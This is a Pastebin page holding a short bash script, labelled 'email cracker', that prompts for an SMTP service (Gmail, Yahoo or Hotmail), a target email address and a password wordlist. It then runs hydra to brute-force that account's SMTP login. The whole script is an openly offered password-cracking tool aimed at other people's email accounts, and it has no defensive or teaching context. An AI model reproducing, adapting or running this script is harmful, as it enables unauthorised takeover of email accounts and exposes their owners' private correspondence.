xanybarz

email cracker

Mar 20th, 2016
157
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.48 KB | None | 0 0
  1. #! /bin/bash
  2.  
  3. echo Email Cracking Script in bash
  4. echo Written By: xany bitches
  5. echo NOTE: You need a wordlist obviously!
  6. echo Starting now:
  7. echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:
  8. read smtp
  9. echo Enter Email Address:
  10. read email
  11. echo Provide Directory of Wordlist for Passwords:
  12. read wordlist
  13.  
  14. hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp
  15.  
  16. ##you need hydra installed for the bash script to work
Add Comment
Please, Sign In to add comment